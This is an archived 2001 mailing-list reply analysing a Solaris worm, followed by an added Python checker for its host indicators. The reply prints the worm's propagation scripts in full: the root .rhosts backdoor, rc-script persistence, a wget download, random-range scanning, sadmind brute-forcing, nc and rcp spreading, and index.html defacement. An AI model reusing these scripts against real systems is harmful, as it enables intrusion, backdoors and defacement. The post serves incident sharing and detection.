Re: httpd and sunrpc probes from 'sunos 5.6' machines

From: Martin Markgraf (mm@RIEN-AG.DE)
Date: Tue May 08 2001 - 03:36:57 PDT


    Hello,
    
    Brad Doctor wrote:
    
    > I've also seen much of the same -- I submitted this to the list over the
    > weekend, but it apparently never made it there.
    >
    > Basically, there is a worm process much like Lion, etc. that after compromising
    > the machine, starts generating IP addresses and going after more.  The exploit
    > that is being used is some sort of sadmin exploit.  A tell-tale sign is a
    > root shell open on port 600 (not functional however).  The exploit places its
    > contents in /dev/cuc and goes to town with a perl script and a random number
    > generator.  It also creates a wide-open .rhosts for root.  It also starts
    > an inetd process with /tmp/.x that has one service, the root shell bound to
    > it, just like the lion stuff did ala "sh -i", however this shell has no IO
    > capabilities on Solaris, and is thus useless.  So, much like the other worms,
    > this one trudges on blindly after cracking a machine that was wide-open to
    > begin with.  I think the same group wrote this one as well due to its
    > similarities in execution and methodology.  It is executing Unicode attacks,
    > with static HTML in the perl script, typical anti US stuff.
    
    In the last five days or so I have seen about 9 scans for port 111 on a single
    machine. Scanning back these hosts has shown that 8 of them are
    running under Solaris 5.6 and have an open port 600. The root shell on the
    machines I have seen was functional if you connect to them with a program
    like netcat instead of telnet, since a simple "sh -i" does not set up an
    appropriate environment.
    The worm itself initially uses port 600 to create a "+ +" .rhosts file in
    the root home directory of a newly hacked box and then copies itself via
    rcp as /tmp/uni.tar to that box.
    
    Here is the file list of the /tmp/uni.tar that I have found:
    
    drwxr-xr-x 0/1               0 Apr 29 12:55 2001 /dev/cuc/
    -rwxr-xr-x 0/1            6556 Apr 26 08:07 2001 /dev/cuc/brute
    -rw-r--r-- 0/1              86 Apr 26 09:13 2001 /dev/cuc/cmd1.txt
    -rw-r--r-- 0/1             655 Apr 29 12:17 2001 /dev/cuc/cmd2.txt
    -rwxr-xr-x 0/1           11828 Apr 25 15:27 2001 /dev/cuc/grabbb
    -rw-r--r-- 0/1             151 Apr 26 09:13 2001 /dev/cuc/ranip.pl
    -rwxr-xr-x 0/1            1591 Apr 27 06:38 2001 /dev/cuc/sadmin.sh
    -rwxr-xr-x 0/1           14644 Apr 25 15:27 2001 /dev/cuc/sadmindex-sparc
    -rwxr-xr-x 0/1             217 Apr 26 09:59 2001 /dev/cuc/start.sh
    -rwxr-xr-x 0/1             566 Apr 27 03:45 2001 /dev/cuc/time.sh
    -rw-r--r-- 0/1           67798 Apr 26 09:13 2001 /dev/cuc/uniattack.pl
    -rwxr-xr-x 0/1             645 Apr 26 09:13 2001 /dev/cuc/uniattack.sh
    -rwxr-xr-x 0/1           28620 Apr 26 08:30 2001 /dev/cuc/nc
    -rw-r--r-- 0/1             413 Apr 26 11:16 2001 /dev/cuc/index.html
    -rwxr-xr-x 0/1          136248 Apr 29 09:20 2001 /dev/cuc/wget
    
    And these are the shell scripts:
    
    cat cmd1.txt
    ------------
    /bin/echo "+ +" > `/bin/grep root /etc/passwd|/bin/awk -F: '{print $6}'`/.rhosts
    exit
    
    
    cat cmd2.txt
    ------------
    /bin/tar -xvf /tmp/uni.tar
    /bin/echo "/bin/nohup /dev/cuc/start.sh >/dev/null 2>&1 &" > /etc/rc2.d/tmp1
    /bin/cat /etc/rc2.d/S71rpc >> /etc/rc2.d/tmp1
    /bin/mv /etc/rc2.d/S71rpc /etc/rc2.d/tmp2
    /bin/mv /etc/rc2.d/tmp1 /etc/rc2.d/S71rpc
    /bin/chmod 744 /etc/rc2.d/S71rpc
    /dev/cuc/wget -c -O /tmp/perl-5.005_03-sol26-sparc-local.gz http://202.96.209.10:80/mirrors/www.sunfreeware.com/sparc/2.6/perl-5.005_03-sol26-sparc-local.gz
    /dev/cuc/gzip -d /tmp/perl-5.005_03-sol26-sparc-local.gz
    /bin/mkdir /usr/local
    /bin/cat /dev/cuc/pkgadd.txt|/usr/sbin/pkgadd -d /tmp/perl-5.005_03-sol26-sparc-local
    /bin/rm -f /tmp/uni.tar /tmp/perl-5.005_03-sol26-sparc-local
    exit
    
    
    cat start.sh
    ------------
    #!/bin/sh
    if [ ! -d /dev/cub ]; then
    /bin/mkdir /dev/cub
    fi
    /bin/nohup /dev/cuc/time.sh &
    i=1
    while [ $i -lt 5 ]
    do
    /bin/nohup /dev/cuc/sadmin.sh &
    /bin/nohup /dev/cuc/uniattack.sh &
    i=`/bin/echo "$i+1"|/bin/bc`
    done
    
    cat time.sh
    -----------
    #!/bin/sh
    /bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp1
    while true
    do
    /bin/sleep 300
    /bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp2
    /bin/awk '{print $2}' /dev/cub/tmp1 > /dev/cub/tmp3
    process=`/bin/awk '{print $2}' /dev/cub/tmp2`
    for p in $process;do
    /bin/grep $p /dev/cub/tmp3
    if [ $? = 0 ];then
    /bin/kill -9 $p
    fi
    done
    /bin/cp /dev/cub/tmp2 /dev/cub/tmp1
    i=`/bin/grep hacked /dev/cub/result.txt|/bin/wc -l`
    if [ $i -gt 2000 ];then
    /bin/nohup /bin/find / -name "index.html" -exec /bin/cp /dev/cuc/index.html {} \; &
    /bin/rm -f /dev/cub/result.txt
    fi
    done
    
    cat sadmin.sh
    -------------
    #!/bin/sh
    while true
    do
    i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
    j=0
    while [ $j -lt 256 ];do
    /dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 111 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 111 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 111 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 111 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 111 >> /dev/cub/$i.txt
    j=`/bin/echo "$j+1"|/bin/bc`
    done
    iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
    for ip in $iplist;do
    /bin/rpcinfo -p $ip > /dev/cub/$i.rpc.txt
    /bin/grep 100232 /dev/cub/$i.rpc.txt >/dev/null 2>&1
    if [ $? = 0 ];then
    /dev/cuc/brute 3 $ip >/dev/null 2>&1
    if [ $? = 0 ];then
    /bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
    /bin/tar -cvf /tmp/uni.tar /dev/cuc
    /bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
    if [ $? = 0 ];then
    /bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
    /bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
    /bin/echo $ip >> /dev/cub/sadminhack.txt
    /bin/rm -f /tmp/uni.tar
    fi
    else
    /dev/cuc/brute 4 $ip >/dev/null 2>&1
    if [ $? = 0 ];then
    /bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
    /bin/tar -cvf /tmp/uni.tar /dev/cuc
    /bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
    if [ $? = 0 ];then
    /bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
    /bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
    /bin/echo $ip >> /dev/cub/sadminhack.txt
    /bin/rm -f /tmp/uni.tar
    fi
    fi
    fi
    fi
    /bin/rm -f /dev/cub/$i.rpc.txt
    done
    /bin/rm -f /dev/cub/$i.txt
    done
    
    cat uniattack.sh
    ----------------
    #!/bin/sh
    while true
    do
    i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
    j=0
    while [ $j -lt 256 ];do
    /dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 80 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 80 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 80 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 80 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 80 >> /dev/cub/$i.txt
    j=`/bin/echo "$j+1"|/bin/bc`
    done
    iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
    for ip in $iplist;do
    /usr/local/bin/perl /dev/cuc/uniattack.pl $ip:80 >> /dev/cub/result.txt
    done
    rm -f /dev/cub/$i.txt
    
    
    regards,
      Martin
    
    --
    Martin Markgraf
    Rien Informationssysteme AG                         fon: +49 2841 9083061
    Eurotec-Ring 15                                     fax: +49 2841 9083069
    D-47445 Moers            http://www.rien-ag.de          mm@rien-ag.de
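The post above gives enough host-side indicators to check a Solaris box for this worm without a live connection to port 600: the /dev/cuc and /dev/cub drop directories, the "+ +" line in root's .rhosts, the /dev/cuc/start.sh line prepended to /etc/rc2.d/S71rpc, the /tmp/.x inetd configuration from Brad's description, and the /dev/cub result and victim lists. The following checker is an added example written for this archive page, not code from the post or from any vendor tool. It works on a simple path-to-content snapshot so it can be exercised offline (the sample snapshots are constructed), and `snapshot_from_disk` builds the same snapshot from a real filesystem. The .rhosts test generalizes slightly beyond the post: it flags any entry whose host field is a bare "+", which covers "+ +" as well as "+" on its own.

```python
"""Indicator check for the sadmind/IIS worm described in the May 2001 post.

Added example for this archive page; not code from the post or the worm.
The paths below are the ones named in the post. Listening port 600 and
the sadmind RPC program are not checked here because that needs a live
socket or rpcinfo call rather than a filesystem snapshot.
"""
import os
from typing import Dict, List, Optional

DROP_DIRS = ("/dev/cuc", "/dev/cub")              # worm payload and scan scratch dirs
RC_SCRIPT = "/etc/rc2.d/S71rpc"                   # rc script the worm rewrites
RC_HOOK = "/dev/cuc/start.sh"                     # line the worm prepends to it
INETD_CONF = "/tmp/.x"                            # inetd config for the port-600 shell
RESULT_FILES = ("/dev/cub/result.txt", "/dev/cub/sadminhack.txt")


def rhosts_trusts_any_host(content: str) -> bool:
    """True if a .rhosts file has a non-comment entry whose host field is "+".

    "+ +" (any host, any user) is what the worm writes; a lone "+" is the same
    host-wildcard with the user field left to default, so it is flagged too.
    """
    for line in content.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.split()[0] == "+":
            return True
    return False


def check_snapshot(fs: Dict[str, Optional[str]], root_home: str = "/") -> List[str]:
    """Return a list of findings for a snapshot mapping path -> content.

    Directories are represented with a value of None. root_home is root's
    home directory from /etc/passwd; on Solaris 2.6 it is "/".
    """
    findings: List[str] = []
    for d in DROP_DIRS:
        if d in fs:
            findings.append("worm drop directory present: " + d)
    rc = fs.get(RC_SCRIPT)
    if rc and RC_HOOK in rc:
        findings.append(RC_SCRIPT + " launches " + RC_HOOK)
    rhosts = fs.get(os.path.join(root_home, ".rhosts"))
    if rhosts and rhosts_trusts_any_host(rhosts):
        findings.append("root .rhosts trusts any host")
    if INETD_CONF in fs:
        findings.append("inetd config for bound root shell present: " + INETD_CONF)
    for f in RESULT_FILES:
        if f in fs:
            findings.append("worm result/victim list present: " + f)
    return findings


def snapshot_from_disk(root_home: str = "/") -> Dict[str, Optional[str]]:
    """Build a snapshot of just the indicator paths from the live filesystem."""
    paths = list(DROP_DIRS) + [RC_SCRIPT, INETD_CONF,
                               os.path.join(root_home, ".rhosts")] + list(RESULT_FILES)
    fs: Dict[str, Optional[str]] = {}
    for p in paths:
        if os.path.isdir(p):
            fs[p] = None
        elif os.path.isfile(p):
            try:
                with open(p, errors="replace") as fh:
                    fs[p] = fh.read()
            except OSError:
                fs[p] = ""
    return fs


# Constructed sample snapshots (not taken from a real host).
SAMPLE_INFECTED: Dict[str, Optional[str]] = {
    "/dev/cuc": None,
    "/dev/cub": None,
    RC_SCRIPT: "/bin/nohup /dev/cuc/start.sh >/dev/null 2>&1 &\n#!/sbin/sh\n# original rpc start script\n",
    "/.rhosts": "+ +\n",
    "/tmp/.x": "constructed inetd line\n",
    "/dev/cub/sadminhack.txt": "192.0.2.10\n",
}
SAMPLE_CLEAN: Dict[str, Optional[str]] = {
    RC_SCRIPT: "#!/sbin/sh\n# start rpcbind\n",
    "/.rhosts": "# trusted hosts\nbackup.example.com operator\n",
}

if __name__ == "__main__":
    for finding in check_snapshot(snapshot_from_disk()):
        print(finding)
```

A clean host yields no findings; the constructed infected snapshot yields six. Because the worm replaces S71rpc rather than adding a new rc file, comparing that script against a known-good copy or package manifest is a stronger check than string matching alone.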
    



    This archive was generated by hypermail 2b30 : Thu May 10 2001 - 23:26:53 PDT